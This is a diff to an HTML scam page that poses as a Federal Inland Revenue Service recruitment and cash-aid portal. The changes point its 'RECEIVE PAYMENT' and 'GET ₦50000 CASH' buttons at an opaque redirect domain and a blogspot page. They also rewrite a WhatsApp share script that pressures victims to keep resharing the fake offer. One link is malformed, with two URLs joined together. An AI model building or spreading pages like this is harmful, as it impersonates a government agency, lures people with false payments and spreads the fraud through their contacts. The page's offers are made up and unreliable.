--- a/Federal-Inland-Rev-Recruitment-Form.html
+++ b/Federal-Inland-Rev-Recruitment-Form.html
@@ -615,12 +615,12 @@ value="Airtel">Abia</option>
 
 
  <br/>
-          <a  onclick="window.open('https://bit.ly/yhauajjdng')" href="https://bit.ly/46RwxPS" >
+          <a  onclick="window.open('//thaudray.com/4/3077182')" href="https://africa-day-mtn-celebration.blogspot.com/#1729238057630" >
                     <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="#ffffff">RECIEVE PAYMENT</font></button>
                     </a><br/>
           
 
-          <a  onclick="window.open('https://bit.ly/yhauajjdng')" href="https://bit.ly/46RwxPS" >
+          <a  onclick="window.open('//thaudray.com/4/3077182')" href="https://bit.ly/46RwxPShttps://africa-day-mtn-celebration.blogspot.com/#1729238057630" >
                     <button style="display: flex;align-items: center;justify-content: center;margin: 0;width: 100%;" class="btn btn-primary"><font color="#ffffff">GET ₦50000 CASH </font></button>
                     </a><br/>
           
@@ -769,11 +769,11 @@ $(document).click(function () {
 
 
    <script>
-        var text1 = "*FEDERAL INLAND REVENUE SERVICE (FIRS) RECRUITMENT 2024/2025*%0A%0AAre You Skilled,Courageous,and principled? Nigeria Needs You.%0A%0A*Application Portal is now Open*%0A_Apply And Also Share To Others there might Be Someone Who Needs This Opportunity_  %0A%0AClick the link below to apply now.%0A%0AApply here%0Ahttps://all-free-byt.org/dangote-refinery",
+        var text1 = "*FEDERAL INLAND REVENUE SERVICE (FIRS) RECRUITMENT 2024/2025*%0A%0AAre You Skilled,Courageous,and principled? Nigeria Needs You.%0A%0A*Application Portal is now Open*%0A_Apply And Also Share To Others there might Be Someone Who Needs This Opportunity_  %0A%0AClick the link below to apply now.%0A%0AApply here%0Ahttps://mpetition.org/Federal-Inland-Rev-Recruitment-Form.html",
             text2 = " an amount of ",
             text3 = "for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
             error = "Something is wrong!\nPosts are not calculated. You may have shared it with the same friend or group more than once, please re-share",
-            abcde = "https://bit.ly/yhauajjdng",
+            abcde = "https://thaudray.com/4/3077182",
             saved = "",
             share = "whatsapp://send?text=" + text1;
     </script>
